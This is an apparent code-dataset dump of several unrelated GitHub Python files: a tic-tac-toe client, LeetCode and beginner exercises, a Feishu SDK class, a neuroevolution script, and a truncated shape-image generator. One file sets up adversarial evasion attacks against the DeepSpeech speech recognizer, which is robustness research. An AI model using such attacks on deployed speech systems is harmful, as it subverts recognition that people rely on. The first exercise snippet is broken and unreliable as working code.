blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
93ccfb613e8a6d37f9533d4e82cc851a21b51f19
|
454447e212ed11c4626268c868f21d69e8beb1d3
|
/Problems/Order!/main.py
|
05c7ff33d459cac6b2bb0c5337dc165563b02b1c
|
[] |
no_license
|
hereskellie/Zookeeper_Python3
|
24930cda82bc43511acd3339c5cdcaa0024e9094
|
1af83866c3a4dd6a88ffcdd687d4446ea8e3f7d3
|
refs/heads/master
| 2022-12-25T13:06:49.337643
| 2020-10-04T20:43:53
| 2020-10-04T20:43:53
| 301,220,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
num1 = int(input())
num2 = int(input())
num3 = int(input())
result == num1 < num2 < num3
print(result)
take input
take variable = 2
in loop(where variable < input )
print variable
increase by 2
|
[
"kelliemjhughes@gmail.com"
] |
kelliemjhughes@gmail.com
|
463f130c700d4c1a9dd6fa39dc7428e19dcfa404
|
2d1367bab56b5fdfb48a9fba03c2595557777652
|
/python/miscellaneous/fixed_point_determiner.py
|
7a2e6d4911c27d50f306c9dccfb84eb07bbb0e2d
|
[] |
no_license
|
baraluga/programming_sandbox
|
11e1855d0c6df00f8a1dc929d1f4a72b2f24f161
|
9113b0ca1a57faa2918509fb935650c97d279c37
|
refs/heads/master
| 2021-07-17T22:48:59.182600
| 2020-05-12T08:05:48
| 2020-05-12T08:05:48
| 150,398,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 577
|
py
|
def get_fixed_point(from_this):
fixed_point = [fix for idx, fix in enumerate(from_this) if idx == fix]
return fixed_point[0] if fixed_point else False
if __name__ == "__main__":
'''
A fixed point in an array is an element whose value is equal to its index.
Given a sorted array of distinct elements, return a fixed point,
if one exists. Otherwise, return False.
For example, given [-6, 0, 2, 40], you should return 2.
Given [1, 5, 7, 8], you should return False.
'''
TEST_INPUT = [-6, 0, 2, 40]
print(get_fixed_point(TEST_INPUT))
|
[
"brian.peralta@tractebel.engie.com"
] |
brian.peralta@tractebel.engie.com
|
c0b3207f5177a907989a02827a6d45637df8f29d
|
1ced884d3844a0c237dd5201bcf64f939b845f76
|
/agent_zoo/ExperimentB.py
|
23e8f09b47314f5c44216c87c1ef95ac0dcbde1a
|
[
"MIT"
] |
permissive
|
bakerb15/roboschool
|
c7bae73e1f5639ccd10bd4961322bb433f6177e4
|
47262b5d572e60fe832a81cbd7ed4eab3667373c
|
refs/heads/master
| 2020-04-02T06:32:00.957618
| 2018-12-09T07:34:26
| 2018-12-09T07:34:26
| 154,154,816
| 1
| 0
|
NOASSERTION
| 2018-10-22T14:05:34
| 2018-10-22T14:05:33
| null |
UTF-8
|
Python
| false
| false
| 6,200
|
py
|
import sys
import random
import time
import copy
import numpy as np
from collections import OrderedDict
from agent_zoo.weight_writer import weight_writer
from agent_zoo.Eval import Eval
NAME = 'B5'
HIGH = 1.5
LOW = .5
SEED = 12
MAX_GEN = 100
MAX_POPULATION = 20
CLONE_RATE = .1
CLONES = int(.05 * MAX_POPULATION)
MAX_FRAME = 200 # how many frames is the robot simulated for
# #B3
# HIGH = 5
# LOW = -5
# SEED = 12
# MAX_GEN = 1000
# MAX_POPULATION = 30
# CLONE_RATE = .05
# CLONES = int(.5 * MAX_POPULATION)
# MAX_FRAME = 50 # how many frames is the robot simulated for
class Individual(object):
def __init__(self, svd_dic, genotype=None):
self.svd_dic = svd_dic #a reference to all the precomputed SVDs
if genotype is None:
self.genotype = [ random.uniform(LOW, HIGH) for i in range(len(svd_dic))]
else:
self.genotype = genotype
self.fitness = None
def get_weights(self):
weights = {}
i = 0
for layer in self.svd_dic:
if self.svd_dic[layer][0] is True:
U, s, V = copy.deepcopy(self.svd_dic[layer][1])
s *= self.genotype[i]
weights[layer] = np.matmul( U ,np.matmul(np.diag(s), V))
else: # a bias layer so matrix multiplication is not necessary
weights[layer] = self.genotype[i] * copy.deepcopy(self.svd_dic[layer][1])
i += 1
return weights
def mate(self, partner):
gt = []
for i in range(len(self.genotype)):
if random.randint(0,99) % 2 == 0:
gt.append(self.genotype[i])
else:
gt.append(partner.genotype[i])
return Individual(self.svd_dic, genotype=gt)
# returns a list individuals that have been selected
def select_parents(population, selection_rate):
total_fitness = 0
for indiv in population:
if indiv.fitness is not None:
total_fitness += indiv.fitness
selected = []
# create a random list of indices
order = [i for i in range(len(population))]
random.shuffle(order)
how_many = int(selection_rate * len(population))
index = 0
while len(selected) < how_many:
indiv = population[order[index]]
if (indiv.fitness / total_fitness) > random.random():
selected.append(indiv)
index += 1
if index > (len(population) -1):
index = 0
return selected
def mutate(individual):
index = random.randint(0, len(individual.genotype) -1)
# individual.genotype[index] = random.uniform(LOW, HIGH) * individual.genotype[index]
individual.genotype[index] = random.uniform(LOW, HIGH)
def clone(individuals):
clones = []
for indiv in individuals:
for i in range(CLONES):
clones.append(Individual(indiv.svd_dic, copy.deepcopy(indiv.genotype)))
return clones
def main():
start_time = time.process_time()
random.seed(SEED)
weightfile = 'RoboschoolAnt_v1_2017jul.weights'
original = {}
exec(open(weightfile).read(), original)
layerNames = ['weights_dense1_w', 'weights_dense1_b', 'weights_dense2_w', 'weights_dense2_b', 'weights_final_w',
'weights_final_b']
svd_dict = OrderedDict()
for layer in layerNames:
if len(original[layer].shape) == 2:
U, s, V = np.linalg.svd( original[layer], full_matrices=False)
svd_dict[layer] = True, (U, s, V)
else:
svd_dict[layer] = False, original[layer]
#generate initial population
population = [Individual(svd_dict) for i in range(MAX_POPULATION)]
print('Starting evolution')
# base_indiv_fitness = evaluate_individual(original)
with open('Experiment{}_results.csv'.format(NAME), 'w') as writer_results:
with open('logEvalb.csv', 'w') as logger:
logger.write('time\n')
header = 'generation, run_time, avg_fitness, top_fitness'
print(header)
writer_results.write(header + '\n')
for generation in range(MAX_GEN):
start = time.process_time()
for indiv in population:
if indiv.fitness is None:
indiv.fitness = Eval().evaluate_individual(MAX_FRAME, indiv.get_weights(), logger)
#select individuals for reproduction
selected = select_parents(population, CLONE_RATE)
#generate children
children = clone(selected)
for child in children:
mutate(child)
#evaluate children
for child in children:
if child.fitness is None:
child.fitness = Eval().evaluate_individual(MAX_FRAME, child.get_weights(), logger)
population.extend(children)
population = sorted(population, key=lambda x: x.fitness, reverse=True)
survivors_indices = [random.randint(3, len(population) -1) for i in range(MAX_POPULATION -1)]
survivors = []
survivors.append(population[0])
survivors.append(population[1])
survivors.append(population[2])
for index in survivors_indices:
survivors.append(population[index])
population = survivors
total_fitness = 0
for indiv in population:
total_fitness += indiv.fitness
avg_fitness = total_fitness/len(population)
run_time = time.process_time() - start
result = '{}, {}, {}, {}'.format(generation, run_time, avg_fitness, population[0].fitness)
print(result)
writer_results.write(result +'\n')
for indiv in population:
indiv.fitness = None
with open('Elite_Individual_Experiment{}.weights'.format(NAME), 'w') as wrt:
weight_writer(wrt, population[0].get_weights())
total_time = time.process_time() - start_time
print('RunTime: {}'.format(str(total_time)))
if __name__ == '__main__':
main()
|
[
"bakerb15@msu.edu"
] |
bakerb15@msu.edu
|
e6266e5cb1980afe195a340cc3ee2136a87072b8
|
074200406165bdcb62132e14c62306d7abcf14ed
|
/080-RemoveDuplicatesFromSortedArrayII/Python/main.py
|
7b40ba8d25c7d0ae73da3e0f55fdf74f3a6637af
|
[] |
no_license
|
Twice22/Leetcode
|
220a6555141b6e5cee283e601a5740a74daf97a9
|
b2e80268a8e7a37b2db09f1103e91db0b4bf424e
|
refs/heads/master
| 2020-03-18T01:48:35.456957
| 2018-12-28T16:31:25
| 2018-12-28T16:31:25
| 134,160,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
class Solution:
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# need to modify inplace with O(1) extra memory
# so we CANNOT use a dict and 2 passes
if not nums:
return 0
ptr_insert, i, size = -1, 0, len(nums)
while i < size:
if ptr_insert != -1 and i != ptr_insert and ((i+1 < size and nums[i+1] != nums[i]) or i+1 >= size):
nums[ptr_insert] = nums[i]
ptr_insert += 1
c = 1
while i + 1 < size and nums[i+1] == nums[i]:
c += 1
i += 1
if ptr_insert != -1 and i != ptr_insert and c <= 3:
nums[ptr_insert] = nums[i]
ptr_insert += 1
if ptr_insert == -1 and c == 3:
ptr_insert = i
# don't forget to add the last
# "2 <=" proove we came from the while loop
if ptr_insert != -1 and 2 <= c < 3:
nums[ptr_insert] = nums[i-1]
ptr_insert += 1
# point on different next number
i += 1
return i if ptr_insert == -1 else ptr_insert
|
[
"victor.busa@gmail.com"
] |
victor.busa@gmail.com
|
e77154fd8017abc681c941a9717e4b66d8284137
|
2335f5b0921030aeb7162dacb044155395a2e98e
|
/conf-cumulativelogprobs/evasion_pgd.py
|
baca3bd5973812fbfa95fc9771441bd123e0a2e0
|
[] |
no_license
|
dijksterhuis/cleverspeech-exp
|
d66a1f9759b50d7bb846a8e32a0a2470989f668d
|
779db8eddb8e5c34888a103c10ad2e1b23eea657
|
refs/heads/master
| 2023-07-09T09:25:32.378259
| 2021-08-09T17:57:37
| 2021-08-09T17:57:37
| 329,070,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,035
|
py
|
#!/usr/bin/env python3
import os
from cleverspeech import data
from cleverspeech import graph
from cleverspeech.utils.Utils import log
from cleverspeech.utils.runtime.Execution import manager
from cleverspeech.utils.runtime.ExperimentArguments import args
# victim model import
from SecEval import VictimAPI as DeepSpeech
# local attack classes
import custom_defs
LOSS_CHOICES = {
"fwd": custom_defs.FwdOnlyLogProbsLoss,
"back": custom_defs.BackOnlyLogProbsLoss,
"fwdplusback": custom_defs.FwdPlusBackLogProbsLoss,
"fwdmultback": custom_defs.FwdMultBackLogProbsLoss,
}
def create_attack_graph(sess, batch, settings):
attack = graph.AttackConstructors.EvasionAttackConstructor(
sess, batch
)
attack.add_path_search(
graph.Paths.ALL_PATHS[settings["align"]]
)
attack.add_placeholders(
graph.Placeholders.Placeholders
)
attack.add_hard_constraint(
graph.Constraints.L2,
r_constant=settings["rescale"],
update_method=settings["constraint_update"],
)
attack.add_perturbation_subgraph(
graph.PerturbationSubGraphs.Independent
)
attack.add_victim(
DeepSpeech.Model,
decoder=settings["decoder"],
beam_width=settings["beam_width"]
)
attack.add_loss(
LOSS_CHOICES[settings["loss"]],
)
attack.add_optimiser(
graph.Optimisers.AdamIndependentOptimiser,
learning_rate=settings["learning_rate"]
)
attack.add_procedure(
graph.Procedures.EvasionCGD,
steps=settings["nsteps"],
update_step=settings["decode_step"]
)
return attack
def custom_extract_results(attack):
results = data.egress.extract.get_attack_state(attack)
target_alpha = attack.loss[0].fwd_target_log_probs
target_beta = attack.loss[0].back_target_log_probs
alpha, beta = attack.procedure.tf_run(
[target_alpha, target_beta]
)
results.update(
{
"alpha": alpha,
"beta": beta,
}
)
return results
def attack_run(master_settings):
align = master_settings["align"]
decoder = master_settings["decoder"]
loss = master_settings["loss"]
outdir = master_settings["outdir"]
attack_type = os.path.basename(__file__).replace(".py", "")
outdir = os.path.join(outdir, attack_type)
outdir = os.path.join(outdir, "confidence/cumulative_logprobs/")
outdir = os.path.join(outdir, "{}/".format(align))
outdir = os.path.join(outdir, "{}/".format(decoder))
outdir = os.path.join(outdir, "{}/".format(loss))
master_settings["outdir"] = outdir
batch_gen = data.ingress.mcv_v1.BatchIterator(master_settings)
manager(
master_settings,
create_attack_graph,
batch_gen,
results_extract_fn=custom_extract_results,
)
log("Finished run.")
if __name__ == '__main__':
extra_args = {
"loss": [str, "fwd", False, LOSS_CHOICES.keys()],
}
args(attack_run, additional_args=extra_args)
|
[
"mrobeson@dundee.ac.uk"
] |
mrobeson@dundee.ac.uk
|
1415423a548d19a490a2a7d777b5a8c84c6ad27d
|
fb7c1b112a92047145ded2e4c90ed93e119ea423
|
/03.py
|
51f2812b6ed3358b9c8dd621fccfa05bbb090a50
|
[] |
no_license
|
CosmoAndrade/PythonExercicios2020
|
54d5285ca7f502f3d4186be583f506b75e8c4ff3
|
005bfae05473d7d22d929e9e7c1888abab514414
|
refs/heads/master
| 2022-11-26T02:56:55.165405
| 2020-08-05T23:40:01
| 2020-08-05T23:40:01
| 284,506,395
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
# Faça um Programa que peça dois números e imprima a soma.
num1 = int(input('Digite um numero: '))
num2 = int(input('Digite outro numero: '))
soma = num1 + num2
print(f'A soma entre {num1} e {num2} é {soma}')
|
[
"cosmo.andrade@hotmail.com"
] |
cosmo.andrade@hotmail.com
|
007ead1dabd05f60c72f61f2b58d80407cf8faea
|
9357b4824629465438353f726ffa08d1c54424d7
|
/hello.py
|
fb7d9ce7e93eea866fc8a7541c65f05addd33f71
|
[] |
no_license
|
Rumdidum/google-course
|
c0b9e51021d4a2e81c4c31fed7df765b5429c602
|
5f0cfe1dcb1b0d20f8e9278d73969aa6060f7105
|
refs/heads/main
| 2023-08-28T15:53:37.752280
| 2021-11-07T14:42:14
| 2021-11-07T14:42:14
| 425,485,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 45
|
py
|
print("was ein dreck")
print("what the hell")
|
[
"waldemar.rink2021@gmail.com"
] |
waldemar.rink2021@gmail.com
|
5cecd4d9e60b44e4ca8d422a0f059209d7ee993c
|
9c88ee174f74a5a8352ec8cf487a302aa87053d0
|
/pylark/api_service_helpdesk_agent_skill_update.py
|
dc104e38fcbf0b2ca93b5a1d0fda43225110d229
|
[
"Apache-2.0"
] |
permissive
|
duzx1/pylark
|
bcf34231218ec5079b8f9820a77864fbcffa4426
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
refs/heads/master
| 2023-08-23T13:10:00.324018
| 2021-11-01T06:29:28
| 2021-11-01T06:29:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,422
|
py
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
from pylark.lark_request import RawRequestReq, _new_method_option
from pylark import lark_type, lark_type_sheet, lark_type_approval
import attr
import typing
import io
@attr.s
class UpdateHelpdeskAgentSkillReqAgentSkillRules(object):
id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "id"}
) # rule id, 看[获取客服技能rules](https://open.feishu.cn/document/ukTMukTMukTM/ucDOyYjL3gjM24yN4IjN/list-agent-skill-rules) 用于获取rules options, 示例值:"test-skill-id"
selected_operator: int = attr.ib(
default=0, metadata={"req_type": "json", "key": "selected_operator"}
) # 运算符compare, 看[客服技能运算符options](https://open.feishu.cn/document/ukTMukTMukTM/ucDOyYjL3gjM24yN4IjN/operator-options), 示例值:3
operator_options: typing.List[int] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "operator_options"}
) # rule操作数value,[客服技能及运算符](https://open.feishu.cn/document/ukTMukTMukTM/ucDOyYjL3gjM24yN4IjN/operator-options)
operand: str = attr.ib(
default="", metadata={"req_type": "json", "key": "operand"}
) # rule操作数value, 示例值:" {, "selected": ["6883005079188668418"],, "options": [, {, "id": "6883005079188668418",, "name": {, "en_us": "小程序及应用",, "ja_jp": "小程序及应用",, "zh_cn": "小程序及应用", }, },, {, "children": [, {, "id": "6883005086914625538",, "name": {, "en_us": "消息提醒",, "ja_jp": "消息提醒",, "zh_cn": "消息提醒", }, },, {, "id": "6883005092723802114",, "name": {, "en_us": "其他",, "ja_jp": "其他",, "zh_cn": "其他", }, }, ],, "id": "6883005085605986306",, "name": {, "en_us": "聊天和群组",, "ja_jp": "聊天和群组",, "zh_cn": "聊天和群组", }, },, ],, }"
@attr.s
class UpdateHelpdeskAgentSkillReqAgentSkill(object):
name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "name"}
) # 技能名, 示例值:"skill-name"
rules: UpdateHelpdeskAgentSkillReqAgentSkillRules = attr.ib(
default=None, metadata={"req_type": "json", "key": "rules"}
) # 技能rules
agent_ids: typing.List[str] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "agent_ids"}
) # 具有此技能的客服ids
@attr.s
class UpdateHelpdeskAgentSkillReq(object):
agent_skill_id: str = attr.ib(
default="", metadata={"req_type": "path", "key": "agent_skill_id"}
) # agent skill id, 示例值:"test-skill-id"
agent_skill: UpdateHelpdeskAgentSkillReqAgentSkill = attr.ib(
default=None, metadata={"req_type": "json", "key": "agent_skill"}
) # 更新技能
@attr.s
class UpdateHelpdeskAgentSkillResp(object):
pass
def _gen_update_helpdesk_agent_skill_req(request, options) -> RawRequestReq:
return RawRequestReq(
dataclass=UpdateHelpdeskAgentSkillResp,
scope="Helpdesk",
api="UpdateHelpdeskAgentSkill",
method="PATCH",
url="https://open.feishu.cn/open-apis/helpdesk/v1/agent_skills/:agent_skill_id",
body=request,
method_option=_new_method_option(options),
need_user_access_token=True,
need_helpdesk_auth=True,
)
|
[
"chyroc@qq.com"
] |
chyroc@qq.com
|
6b85f42196e17ff4126d054a820bf3b7a4e41bc1
|
d8fc7c283c3a9d82d1beed34aebaf63c9aae809e
|
/app/web/__init__.py
|
c22e0f946653879d8ae731cb76cd2332c6931589
|
[] |
no_license
|
cardinalion/learnflask
|
dc2cea4e3eda864b4f69e7cda8f324afaf68c9ef
|
8224361478357bbb58e6ee8bcf38183910dd82a1
|
refs/heads/master
| 2020-04-17T17:12:21.963928
| 2019-01-24T04:42:58
| 2019-01-24T04:42:58
| 166,773,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
"""
1/23/2019
"""
__author__ = 'cardinalion'
|
[
"ywang10@wesleyan.edu"
] |
ywang10@wesleyan.edu
|
53b2ae48b341c3264c6e26ff968ef5a96651cdac
|
c86693fe6e877a7fabd4cbbaf42c35e1c3f7981a
|
/client/Commands.py
|
39ab8591d846cc5bea06ec647a7c54dc3246689d
|
[] |
no_license
|
NormanLe/Tic-Tac-Toe-Server
|
0e546998a9ca51db594143248ac3c4bdceadc0df
|
86dec773e5770034b4c1f802ad2b19c22868271b
|
refs/heads/master
| 2021-01-20T15:26:17.959532
| 2017-06-14T02:17:27
| 2017-06-14T02:17:27
| 90,766,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,388
|
py
|
''' Functions to support commands input by user.
'''
import sys
import MessageHandler
from const import *
def help():
''' This command takes no argument. It prints a list of supported commands, which are ones in
this list. For each command, it prints a brief description of the command function and
the syntax of usage
'''
print("Supported commands:")
print("help : Print a list of supported commands")
print(
"login [name] [mode]: Login to the game server. Takes 2 arguments, [name] and [mode], A for automatch, M for automatch off")
print("place [n] : Issues a move. Takes one argument [n], which is between 1 and 9 inclusive")
print("exit : Exit the server")
print("who : List all players logged in")
print("games : List all ongoing games")
print("play [name] : Request to play a user. Takes one argument, [name] of player to request\n")
def login(s, state, name, mode):
''' This command takes one argument, your name. A player name is a userid that uniquely
identifies a player. Your name is entered with this command and is sent to the server.
Return True if login success, False if login failed.'''
if mode is None:
mode = 'A'
if mode and mode not in ['A', 'M']:
print("Mode must be A or M\n")
return
# Send message to server
s.send(LOGIN(name, mode))
# Receive response message from server
s.recv_messages()
# Check response from server
response = s.read_message()
while response:
if response in [OK, ERR401]:
MessageHandler.handle_login(s, state, response, name, mode)
return
else:
MessageHandler.handle_unrecognized(s, state, response)
response = s.read_message()
def place(s, state, n):
'''This command issues a move. It takes one argument n, which is between 1 and 9 inclusive.
It identify a cell that the player chooses to occupy at this move.
If all is well, the new game state is received from the server and displayed.'''
try:
n = int(n)
except ValueError:
print("place must be called with an integer argument\n")
return
# Send place message to server
s.send(PLACE(n))
def exit(s, state):
''' This command allows player to exit '''
# Check if player logged in:
# if not state.logged_in:
# print("You are not logged in.\n")
# return
# Send exit message to server
s.send(EXIT)
print("Exiting ... \n")
sys.exit()
# Note: Remaining code won't execute/matter,
# Since server will close connection immediately.
# Update state
state.initiated_exit = True
state.clear_game()
s.recv_messages()
response = s.read_message()
# Exit can be received from main
while response:
if response in [OK, QUIT]:
MessageHandler.handle_quit(s, state, response)
response = s.read_message()
def games(s):
s.send(GAMES)
# nothing else needs to be done, just wait for response
def who(s):
s.send(WHO)
# nothing else needs to be done, just wait for response
def play(s, name):
s.send(PLAY(name))
# nothing else needs to be done, just wait for found/error
def observe(s, name):
s.send(OBSERVE(name))
def unobserve(s, name):
s.send(UNOBSERVE(name))
def message(s, message):
s.send(message)
|
[
"norman.le@stonybrook.edu"
] |
norman.le@stonybrook.edu
|
017688ce2eb9785ec864f48899013443afcaf24e
|
70b65dfeafb3821ea09e55e846915bd57d4a10ff
|
/data.py
|
682e7f1d8bd22c2d5fb568f03423e8590e5064a1
|
[] |
no_license
|
maxeonyx/comp421-project
|
21a05eabf15eac46be386ee7effd6c6865236d7b
|
73700f0744fda37c75d6e90740a8544c152eb62c
|
refs/heads/master
| 2023-01-05T01:17:45.830898
| 2020-10-23T10:57:39
| 2020-10-23T10:57:39
| 304,153,062
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,597
|
py
|
import numpy as np
import tensorflow as tf
from PIL import Image, ImageDraw
import itertools
from IPython.display import display
shape_types = [
"line",
"square",
"circle",
"tri",
]
line_types = [
"single",
"double",
"filled",
]
colors = [
"white",
"blue",
"green",
"red",
"rainbow",
]
dont_include = [
("line", "filled", "green"),
("square", "filled", "green"),
("circle", "filled", "green"),
("line", "filled", "green"),
("square", "filled", "green"),
("circle", "filled", "green"),
]
def all_classes():
return itertools.product(shape_types, line_types, colors)
def rainbow(shape, center_x, center_y, angle):
rx = np.linspace(-1, 1, shape[0])
ry = np.linspace(-1, 1, shape[1])
coords = np.stack(np.meshgrid(rx, ry), axis=-1)
angles = np.arctan2(coords[:, :, 0] - center_x, coords[:, :, 1] - center_y) + angle
magnitudes = np.linalg.norm(coords, axis=-1)
h = angles / (2*np.pi) + 0.5
s = np.clip(magnitudes*2, 0, 1)
v = np.ones_like(angles)
hsv = np.stack([h, s, v], axis=-1)
hsv = (hsv * 255).astype(np.uint8)
i = Image.fromarray(hsv, mode="HSV")
i = i.convert(mode="RGB")
rgb = np.asarray(i).astype(np.float) / 255.0
return rgb
def new_line(d, center_x, center_y, radius, angle, fill, line_width):
point1x = center_x + radius * np.cos(angle)
point1y = center_y + radius * np.sin(angle)
point2x = center_x + radius * np.cos(angle+np.pi)
point2y = center_y + radius * np.sin(angle+np.pi)
d.line([(point1x, point1y), (point2x,point2y)], fill=fill, width=int(line_width))
def square(d, center_x, center_y, radius, angle, fill):
point1x = center_x + radius * np.cos(angle)
point1y = center_y + radius * np.sin(angle)
point2x = center_x + radius * np.cos(angle+np.pi/2)
point2y = center_y + radius * np.sin(angle+np.pi/2)
point3x = center_x + radius * np.cos(angle+np.pi)
point3y = center_y + radius * np.sin(angle+np.pi)
point4x = center_x + radius * np.cos(angle-np.pi/2)
point4y = center_y + radius * np.sin(angle-np.pi/2)
d.polygon([(point1x, point1y), (point2x,point2y), (point3x,point3y), (point4x,point4y)], fill=fill)
def tri(d, center_x, center_y, radius, angle, fill):
point1x = center_x + radius * np.cos(angle)
point1y = center_y + radius * np.sin(angle)
point2x = center_x + radius * np.cos(angle+2*np.pi/3)
point2y = center_y + radius * np.sin(angle+2*np.pi/3)
point3x = center_x + radius * np.cos(angle-2*np.pi/3)
point3y = center_y + radius * np.sin(angle-2*np.pi/3)
d.polygon([(point1x, point1y), (point2x,point2y), (point3x,point3y)], fill=fill)
def circle(d, center_x, center_y, radius, angle, fill):
d.ellipse([(center_x - radius, center_y - radius), (center_x + radius, center_y + radius)], fill=fill)
# assumes 3 channels
def shapes(params, draw_size, resize_to, min_radius, max_radius, line_width):
n_images = len(params)
image_width = draw_size
image_height = draw_size
# images = np.zeros((len(params), resize_to, resize_to, 3), dtype=np.float)
images = np.random.random([len(params), resize_to, resize_to, 3])
# background = np.random.random([len(params), resize_to, resize_to, 3])
background = np.zeros([len(params), resize_to, resize_to, 3])
white = (255, 255, 255)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
black = (0, 0, 0)
rbow = rainbow(images[0].shape, 0, 0, 0)
for i in range(n_images):
shape, line_type, color = params[i]
radius = np.random.uniform(min_radius, max_radius)
angle = np.random.uniform(-np.pi, np.pi)
# leave 2 pixels at the edge
center_x = np.random.uniform(0+radius+2, image_width-radius-2)
center_y = np.random.uniform(0+radius+2, image_height-radius-2)
angle = np.random.uniform(-np.pi, np.pi)
# img = Image.fromarray(noiseimages[i], "RGB")
img = Image.new("RGB", (draw_size, draw_size))
d = ImageDraw.Draw(img)
fill = white
if shape == "line":
if line_type == "single":
new_line(d, center_x, center_y, radius, angle, fill, line_width)
elif line_type == "filled":
new_line(d, center_x, center_y, radius, angle, fill, line_width * 4)
elif line_type == "double":
center_offset_x = line_width * np.cos(angle + np.pi/2)
center_offset_y = line_width * np.sin(angle + np.pi/2)
new_line(d, center_x + center_offset_x, center_y + center_offset_y, radius, angle, fill, line_width)
new_line(d, center_x - center_offset_x, center_y - center_offset_y, radius, angle, fill, line_width)
pass
if shape == "tri":
tri_line_width = line_width * 2
tri(d, center_x, center_y, radius, angle, fill)
if line_type != "filled":
tri(d, center_x, center_y, radius-tri_line_width, angle, black)
if line_type == "double":
tri(d, center_x, center_y, radius-tri_line_width*2-1, angle, fill)
tri(d, center_x, center_y, radius-tri_line_width*3-1, angle, black)
elif shape == "square":
sq_line_width = line_width * 1.41
square(d, center_x, center_y, radius, angle, fill)
if line_type != "filled":
square(d, center_x, center_y, radius-sq_line_width, angle, black)
if line_type == "double":
square(d, center_x, center_y, radius-sq_line_width*2-1, angle, fill)
square(d, center_x, center_y, radius-sq_line_width*3-1, angle, black)
elif shape == "circle":
circle(d, center_x, center_y, radius, angle, fill)
if line_type != "filled":
circle(d, center_x, center_y, radius-line_width, angle, black)
if line_type == "double":
circle(d, center_x, center_y, radius-line_width*2-1, angle, fill)
circle(d, center_x, center_y, radius-line_width*3-1, angle, black)
img = img.resize((resize_to, resize_to))
mask = np.asarray(img).astype(np.float) / 255.0
if color == "rainbow":
images[i] = rbow * mask + background[i] * (1 - mask)
elif color == "red":
images[i] = np.array([1, 0, 0]) * mask + background[i] * (1 - mask)
elif color == "green":
images[i] = np.array([0, 1, 0]) * mask + background[i] * (1 - mask)
elif color == "blue":
images[i] = np.array([0, 0, 1]) * mask + background[i] * (1 - mask)
elif color == "white":
images[i] = mask + background[i] * (1 - mask)
return images
def example_shapes():
par = list(all_classes())
draw_size = 200
resize_to = 48
line_width = draw_size / 25
min_radius = line_width * 6
max_radius = min_radius * 1.5
images = shapes(par, draw_size, resize_to, min_radius=min_radius, max_radius=max_radius, line_width=line_width)
return images
def line(images, min_length=48, max_length=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
lengths = np.random.uniform(min_length, max_length, n_images)
angles = np.random.uniform(-np.pi, np.pi, n_images)
widths = lengths * np.cos(angles)
heights = lengths * np.sin(angles)
x_lows = np.clip(-widths+1, 1, image_width-1)
x_highs = np.clip(image_width-widths-1, 1, image_width-1)
y_lows = np.clip(-heights+1, 1, image_height-1)
y_highs = np.clip(image_height-heights-1, 1, image_height-1)
starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
ends = starts + np.stack([widths, heights], axis=1)
starts = starts.astype(np.uint32)
ends = ends.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.line([tuple(starts[i]), tuple(ends[i])], fill=255, width=6)
def rect(images, min_size=16, max_size=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
widths = np.random.uniform(min_size, max_size, n_images)
heights = np.random.uniform(min_size, max_size, n_images)
x_lows = np.clip(-widths+1, 1, image_width-1)
x_highs = np.clip(image_width-widths-1, 1, image_width-1)
y_lows = np.clip(-heights+1, 1, image_height-1)
y_highs = np.clip(image_height-heights-1, 1, image_height-1)
starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
ends = starts + np.stack([widths, heights], axis=1)
starts = starts.astype(np.uint32)
ends = ends.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.rectangle([tuple(starts[i]), tuple(ends[i])], fill=255)
def circleold(images, min_size=32, max_size=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
diameters = np.random.uniform(min_size, max_size, n_images)
x_lows = np.clip(-diameters+1, 1, image_width-1)
x_highs = np.clip(image_width-diameters-1, 1, image_width-1)
y_lows = np.clip(-diameters+1, 1, image_height-1)
y_highs = np.clip(image_height-diameters-1, 1, image_height-1)
